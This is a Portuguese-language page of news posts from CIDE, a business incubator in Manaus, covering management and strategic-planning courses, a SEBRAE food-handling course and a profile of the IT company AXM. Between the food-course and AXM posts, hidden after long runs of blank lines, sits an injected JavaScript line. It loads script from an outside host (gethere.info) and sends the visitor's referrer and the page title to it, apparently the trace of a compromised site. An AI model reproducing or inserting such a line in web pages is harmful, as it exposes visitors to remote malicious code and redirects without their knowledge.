Empresários aprendem a definir a identidade

Empreendedores realizam atividades em grupo.
Empreendedores realizam atividades em grupo.

 

O empresariado do Centro de Incubação e Desenvolvimento Empresarial (CIDE) retomou, nesta manhã de segunda-feira, 28, a formação pessoal e a dos colaboradores das empresas com o curso Planejamento Estratégico, ministrado pelo economista Geraldo Magela, na sala de capacitação da própria incubadora de empresas. O objetivo do encontro é corrigir os principais erros nas gestões consideradas “familiares” e o término está previsto para o dia 31 deste mês.

Segundo o consultor Magela, essa etapa do curso tem a finalidade de definir a identidade organizacional das empresas. “Vamos consolidar os valores das empresas, a sua missão, a sua visão de futuro. A proposta é analisar e dar significado a tudo isso”, resume, acrescentando que os participantes vão traçar um plano para alcançar o que eles realmente desejam.

Para os próximos meses, o CIDE vai proporcionar aos empreendedores instalados mais formação em parceria com a Federação das Indústrias do Estado do Amazonas (FIEAM), com o objetivo de superar as dificuldades pelas quais passam a maioria das pequenas e médias empresas.

Empresários de doze empresas participam do curso.
Empresários de doze empresas participam do curso.

 

O coach Geraldo Magela fala para os empresários.
O coach Geraldo Magela fala para os empresários.

 

Dinâmicas em grupo faz parte da capacitação.
Dinâmicas em grupo faz parte da capacitação.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Empresários do CIDE profissionalizam a gestão

O economista Geraldo Magela recebe os empresários, no primeiro dia de formação
O economista Geraldo Magela recebe os empresários, no primeiro dia de formação

 

 

 

 

 

 

 

 

 

Os empreendedores, instalados no Centro de Incubação e Desenvolvimento Empresarial (CIDE), concluíram, no mês de maio, o primeiro módulo de formação, intitulado “Profissionalização da Gestão”, para corrigir os principais erros nas gestões consideradas “familiares”, nos aspectos financeiro e processo empresarial.

 Durante uma semana, os empresários ouviram palestras, compartilharam experiências positivas e negativas, ouviram casos e realizaram exercícios em grupos. “A profissionalização da gestão começa pela postura de cada empreendedor, controlando o seu Ego, melhorando sua relação com os funcionários e os clientes, evitando o paternalismo, o nepotismo, a centralização dos trabalhos e os critérios de contratação”, diz o economista e coach Geraldo Magela.

No mês de junho, o empresariado volta à sala de formação para dar continuidade aos trabalhos.

 

Aproximadamente 14 empresários participam das formações
Aproximadamente 14 empresários participam das formações

 

Empresários recebem o certificado de conclusão do primeiro módulo
Empresários recebem o certificado de conclusão do primeiro módulo

 

Empresários apresentam os trabalhos da formação
Empresários apresentam os trabalhos da formação

 

For4

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Capacitação vai ajudar a identificar e superar dificuldades do Processo Empresarial

O diretor executivo do CIDE, José Grosso, explica a atividade empresarial.
O diretor executivo do CIDE, José Grosso, explica a atividade empresarial.

 

Com o objetivo de melhorar a capacitação empresarial dos empreendedores e a gestão das empresas, o Centro de Incubação e Desenvolvimento Empresarial (CIDE) fez uma parceria com o Departamento de Assistência à Média e Pequena Indústria (DAMPI), da Federação das Indústrias do Estado do Amazonas (FIEAM), para realizar várias atividades ao longo dos próximos meses que ajudem a identificar e a superar as dificuldades no processo empresarial dos empreendimentos instalados na incubadora.

 

ETAPAS DA CAPACITAÇÃO

Em uma palestra de sensibilização para a equipe técnica do CIDE e os empresários instalados, os responsáveis pelas formações do projeto, Graça Emiliano e o economista Geraldo Magela, pediram a participação de todos.

 

Segundo Magela, o projeto passará por três etapas que vão melhorar a estrutura funcional das empresas. “A primeira questão com a qual vamos trabalhar é a profissão da gestão porque são empresas consideradas ainda pequenas e, portanto, precisam profissionalizar a sua gestão, separando o aspecto familiar do aspecto empresarial”, diz o economista.

 

Ainda segundo os palestrantes, a segunda etapa consistirá no Empreendedorismo. “Às vezes, a pessoa é empresário, mas não é empreendedor, ou seja, falta a ele um comportamento de realizar planejamentos, métodos, metas, etc.”, diz Magela.

 

A capacitação incluirá também, Planejamento Estratégico, respondendo a perguntas, como quem queremos ser no mercado e quais as estratégias para alcançar um fim proposto. “Por último, realizaremos uma formação ligada à Padronização e à Melhoria do Ambiente, ou seja, criar padrões na empresa, criar sua personalidade, a identidade, dando força para que a empresa encare os desafios do mercado”, conclui o economista, dizendo que as práticas de gestão são aplicáveis a qualquer tipo de organização.

 

O próximo passo será estabelecer o melhor dia de atividades para o empresariado, o melhor horário, estruturar as turmas e as participações por empresa, e realizar os treinamentos ainda no mês de maio.

Empreendedores e técnicos do CIDE que vão participar das formações.
Empreendedores e técnicos do CIDE que vão participar das formações.

 

A coordenadora do CIDE-Polo de Modas, Elizabeth Araújo, fala da importância das formações.
A coordenadora do CIDE-Polo de Modas, Elizabeth Araújo, fala da importância das formações.

 

 

A técnica do CIDE, Rosália Padilha, fala aos empreendedores.
A técnica do CIDE, Rosália Padilha, fala aos empreendedores.

 

 

Empresários instalados no CIDE manifestam a sua opinião.
Empresários instalados no CIDE manifestam a sua opinião.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Formação reúne empreendedores do setor de Alimentação e de Bebidas

Participantes do curso de manipulação de alimentos, no SEBRAE.
Participantes do curso de manipulação de alimentos, no SEBRAE.

 

 

Com o objetivo de melhorar a capacitação no preparo e manipulação de alimentos, e no atendimento aos clientes, os empreendedores e funcionários de empresas do setor de alimentos, instaladas no Centro de Incubação e Desenvolvimento Empresarial (CIDE) receberam, durante duas semanas, do Serviço Brasileiro de Apoio às Micro e Pequenas Empresas (SEBRAE) formação com consultores e nutricionistas especializados.

 

Conforme a nutricionista Ana Rita Quadros, o controle de qualidade dos alimentos envolve técnicas e procedimentos adequados. “As técnicas transmitidas no curso garantem qualidade, higiene e segurança durante o preparo dos alimentos e, consequentemente, segurança na hora de consumi-los”, diz Quadros, acrescentando que curso promove também mudanças de atitude nos responsáveis pela fabricação de produtos alimentícios, evitando possíveis contaminações.

 

Para o funcionário da Amazon Doces, empresa incubada no CIDE, Raimundo Oliveira, o curso de manipulação de alimentos vai além do aspecto empresarial. “O que aprendemos serve para colocar em prática na empresa e em casa, no dia a dia de cada um. Técnicas de higienização, limpeza do local de trabalho, da farda, barba cortada, não misturar as louças, etc. são coisas que aprendemos e vamos praticar”, conta.

Funcionários de empresas do CIDE estiveram no curso do SEBRAE.
Funcionários de empresas do CIDE estiveram no curso do SEBRAE.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

O lado humano da Tecnologia da Informação

A AXM atua no segmento de Desenvolvimento de Sistemas
A AXM atua no segmento de Desenvolvimento de Sistemas

 

A AXM, do segmento de Tecnologia da Informação e associada ao Centro de Incubação e Desenvolvimento Empresarial (CIDE), é um excelente exemplo de empresa que estende uma mão aos jovens empreendedores de Startups; se preocupa com a formação de novos profissionais, dando consultoria e treinamentos, e com os descartes de máquinas leitoras de cartão de crédito, oferecendo opções de troca por modelos mais modernos.

 

Segundo a proprietária e administradora de empresas, Adriana Ximenes, as oportunidades e os conhecimentos das demandas das firmas multinacionais do Polo Industrial de Manaus a levaram a constituir a própria empresa. “Eu sempre trabalhei na área industrial. Depois de muito tempo, analisando perfis de consultores e de outros profissionais da área, eu decidi abrir minha própria empresa em 2009, prestando serviços de treinamentos sobre Lei de Informática para empresas e instituições”, conta.

 

Ainda conforme Ximenes, em 2015, a AXM viu a oportunidade de atuar na área de Desenvolvimento de Sistemas. “Começamos a desenvolver projetos e produtos inovadores na área de Tecnologia da Informação e Automação Comercial em parceria com empresas e o Cide. Para nós, foi um ano muito próspero”, diz a administradora de empresas.

 

Reuso do equipamento

Em tempos de fazer economia e busca da eficiência no desenvolvimento dos trabalhos, a AXM desenvolveu em parceria com outra empresa, um projeto de rastreamento de equipamentos leitores de cartão, as conhecidas máquinas de cartão de crédito.

 

“Hoje em dia, a tecnologia presente nessas máquinas de cartão está em constante mudança para melhor. Então, é necessário a atualização das máquinas leitoras e, portanto, a substituição do aparelho. Para que elas não sejam jogadas em lixo comum, nós desenvolvemos uma plataforma em que o fabricante das máquinas recolhe esses produtos, dando condições para que o usuário, o comerciante possa adquirir uma máquina nova e atualizada”, explica Ximenes.

Para saber mais: www.axmconsultoria.com e redes sociais

A proprietária de AXM, Adriana Ximenes, e funcionários de multinacionais
A proprietária de AXM, Adriana Ximenes, e funcionários de multinacionais